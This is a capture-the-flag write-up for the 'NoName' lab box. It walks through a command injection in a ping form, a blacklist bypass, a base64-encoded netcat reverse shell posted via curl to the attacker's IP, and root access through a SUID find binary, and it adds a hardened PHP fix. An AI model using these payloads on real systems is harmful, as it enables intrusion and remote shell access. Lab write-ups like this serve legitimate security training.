[Offensive Security] Proving Grounds - NoName
https://portal.offensive-security.com/proving-grounds/play https://www.vulnhub.com/entry/haclabs-no_name,429/
NoName may appear easy, but not everything is always straightforward. Only local.txt and proof.txt are valid flags.
Footprinting
Open ports
Nmap SYN scan:
kali@kali:~$ sudo nmap -sS -p- -Pn -v10 -oA syn_full 192.168.207.15
Discovered open port 80/tcp on 192.168.207.15
NSE scan:
kali@kali:~$ sudo nmap -sC -sV -p80 -Pn -v10 -oA nse 192.168.207.15
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
HTTP
On the main web page, there is a form that asks for an IP address:
>>>
POST /index.php HTTP/1.1
Host: 192.168.207.15
box=fake+query&submitt=submit
<<<
<h4>Fake Admin Area</h4>
<form action="index.php" method="post">
<input type="text" placeholder="fake query" name="box">
<input type="submit" placeholder="Run" value="submit" name="submitt">
</form>
Fake ping executed
However, this is a fake query box: the submitted IP is never processed. Directory enumeration with ffuf reveals an admin directory:
kali@kali:~$ ffuf -v -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.207.15/FUZZ -t 50 -fc 404,403 -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
"http://192.168.207.15/
"http://192.168.207.15/"
"http://192.168.207.15/."
"http://192.168.207.15/admin"
"http://192.168.207.15/index.php"
This resource contains 4 images, with no sensitive information:
kali@kali:~$ wget -r http://192.168.207.15/admin
kali@kali:~$ ls ./192.168.207.15
ctf-01.jpg haclabs.jpeg new.jpg Short.png
kali@kali:~$ exiftool ./192.168.207.15/*
Steganographic message
Looking closer at that admin page, a passphrase is hidden in an HTML comment at the very bottom of the response!
>>>
GET /admin HTTP/1.1
Host: 192.168.207.15
<<<
<html>
<body style="background-color:Gainsboro;text-align:center">
<h3 text-align:center>HacLabs directory of gallery.</h3>
<img src="new.jpg" height="200" width="200">
<br>
<img src="ctf-01.jpg" height="200" width="200">
<br>
<img src="haclabs.jpeg" height="200" width="200">
<br>
<img src="Short.png" height="200" width="200">
</body>
</html>
[...]
<!--passphrase:harder-->
But what can I do with that passphrase? Is there a hidden file in one of the images?
kali@kali:~$ steghide extract -sf haclabs.jpeg
Enter passphrase:
wrote extracted data to "imp.txt".
Yup!
kali@kali:~$ cat imp.txt
c3VwZXJhZG1pbi5waHA=
kali@kali:~$ base64 -d imp.txt
superadmin.php
This superadmin.php page contains a ping feature (which is real this time!):
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=127.0.0.1&submitt=Submit+Query
<<<
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.015 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.027 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2030ms
rtt min/avg/max/mdev = 0.015/0.023/0.029/0.008 ms
OS Command Injection
This output is identical to what a standard shell returns for ping -c 3, which strongly suggests the input is handed to a system command:
kali@kali:~$ ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.013 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.060 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2036ms
rtt min/avg/max/mdev = 0.013/0.037/0.060/0.019 ms
I immediately found a blind command injection using the pipe symbol:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=|sleep+10&submitt=Submit+Query
<<<
[10,452millis]
Note that the injection doesn't need to be blind, as the output is returned in the response:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=|id&submitt=Submit+Query
<<<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
This confirms that the query form in index.php was a rabbit hole, as the user's input is never processed:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0acat+index.php&submitt=Submit+Query
<<<
<?php
if (isset($_POST['submitt']))
{
echo "Fake ping executed";
}
?>
But getting a reverse shell is not that easy, as some patterns are filtered, such as nc or & (URL-encoded %26):
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0asleep+2%26&submitt=Submit+Query
<<<
[14millis]
Note that a Line Feed (\n, URL-encoded %0a) can also be used to inject the next command.
Here, the injected command was not executed, as the response came back in well under 2 seconds (0.014 s). In fact, the source code shows that the filtered patterns are array(";", "&&", "/", "bin", "&", " &&", "ls", "nc", "dir", "pwd"):
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0acat+superadmin.php&submitt=Submit+Query
<<<
<?php
if (isset($_POST['submitt']))
{
    $word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
    $pinged=$_POST['pinger'];
    $newStr = str_replace($word, "", $pinged);
    if(strcmp($pinged, $newStr) == 0)
    {
        $flag=1;
    }
    else
    {
        $flag=0;
    }
}
if ($flag==1){
    $outer=shell_exec("ping -c 3 $pinged");
    echo "<pre>$outer</pre>";
}
?>
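For contrast, here is a hardened version of that handler, added as an example and not code from the box: the str_replace blacklist (which lets through any metacharacter or spelling it does not list, such as a newline or a pipe) is replaced by an allow-list check with filter_var(FILTER_VALIDATE_IP), and the validated value is still wrapped in escapeshellarg(). The function names validate_ping_target and run_ping are my own.

```php
<?php
// Hardened replacement for the vulnerable superadmin.php ping handler
// (added example, not the box's original code).

// Return the input only if it is a literal IPv4/IPv6 address, otherwise null.
// Reject-by-default: shell metacharacters, newlines, backslashes and any other
// trick simply fail the allow-list check instead of being looked up in a blacklist.
function validate_ping_target(string $input): ?string
{
    $ip = filter_var(trim($input), FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

// Run ping against a validated target and return HTML-safe output.
function run_ping(string $input): string
{
    $ip = validate_ping_target($input);
    if ($ip === null) {
        // Do not echo the rejected input back: that would only help an attacker
        // fine-tune a payload.
        return '<pre>Invalid IP address</pre>';
    }

    // Defence in depth: even though $ip has been validated, pass it to the shell
    // as a single quoted argument so it can never be parsed as shell syntax.
    $cmd   = 'ping -c 3 -W 2 ' . escapeshellarg($ip);
    $outer = shell_exec($cmd);

    // Encode before rendering so ping output cannot inject HTML into the page.
    return '<pre>' . htmlspecialchars((string) $outer, ENT_QUOTES, 'UTF-8') . '</pre>';
}

if (isset($_POST['submitt'])) {
    echo run_ping($_POST['pinger'] ?? '');
}
```

With this version, every injection attempt shown on this page (|id, %0a..., n\c) is rejected before any command runs, because none of them is a valid IP address.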
Getting a reverse shell with nc is tougher than it sounds, but bypasses exist!
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0al\s%0a&submitt=Submit+Query
<<<
Short.png
admin
ctf-01.jpg
haclabs.jpeg
index.php
new.jpg
superadmin.php
Indeed, nc can be written as n\c to bypass the filter: the blacklist does not match the escaped spelling, and the shell strips the backslash before executing the command:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0ash|n\c++192.168.49.207+48590&submitt=Submit+Query
<<<
$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38142
Arf! No command is being executed...
$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38144
id
ls
whoami
echo plz
After lots of trials and errors, I realized the following payload worked:
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.207 48590 >/tmp/f' |base64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu
NDkuMjA3IDQ4NTkwID4vdG1wL2YK
Note that the base64-encoded command contains a newline, which should be URL-encoded as %0a:
>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15
pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query
<<<
$ nc -nlvp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38194
sh: 0: can't access tty; job control turned off
$ whoami
www-data
A one-liner reverse shell could be:
$ curl -X POST -d "pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query" http://192.168.207.15/superadmin.php
Local privilege escalation
local.txt
The users are:
$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
haclabs:x:1000:1000:haclabs,,,:/home/haclabs:/bin/bash
yash:x:1001:1001:,,,:/home/yash:/bin/bash
The first flag is in yash's directory:
$ cd /home/yash
$ ls
flag1.txt
local.txt
$ cat *
Due to some security issues,I have saved haclabs password in a hidden file.
95[...]e6
proof.txt
Given the hint above, let's search for haclabs's password:
Due to some security issues,I have saved haclabs password in a hidden file.
Well, nothing interesting in his folder:
$ cd /home/haclabs
$ ls -la
total 80
drwxr-xr-x 16 haclabs haclabs 4096 Mar 16 2020 .
drwxr-xr-x 4 root root 4096 Jan 27 2020 ..
-rw------- 1 haclabs haclabs 2576 Jan 30 2020 .ICEauthority
-rw-r--r-- 1 root root 0 Mar 16 2020 .bash_history
-rw-r--r-- 1 haclabs haclabs 3771 Jan 27 2020 .bashrc
drwx------ 13 haclabs haclabs 4096 Feb 9 2020 .cache
drwx------ 11 haclabs haclabs 4096 Jan 27 2020 .config
drwx------ 3 haclabs haclabs 4096 Jan 27 2020 .gnupg
drwx------ 3 haclabs haclabs 4096 Jan 27 2020 .local
drwx------ 5 haclabs haclabs 4096 Jan 27 2020 .mozilla
-rw-r--r-- 1 haclabs haclabs 807 Jan 27 2020 .profile
drwx------ 2 haclabs haclabs 4096 Jan 27 2020 .ssh
-rw-r--r-- 1 haclabs haclabs 0 Jan 27 2020 .sudo_as_admin_successful
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Desktop
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Documents
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Downloads
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Music
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Pictures
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Public
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Templates
drwxr-xr-x 2 haclabs haclabs 4096 Jan 27 2020 Videos
-rw-r--r-- 1 root root 152 Jan 30 2020 flag2.txt
Is there anything interesting in flag2.txt?
$ cat flag2.txt
I am flag2
--------------- ----------------
--------
Nope :/ Using linpeas, I realized searching for haclabs's password was a rabbit hole. Indeed, I forgot to look for root SUIDs!
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 233K Nov 5 2017 /usr/bin/find
Exploiting that SUID find binary, we get the root flag:
$ find . -exec /bin/sh -p \; -quit
$ id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
$ ls /root
flag3.txt
proof.txt
$ cat /root/*
Your flag is in another file...
41[...]51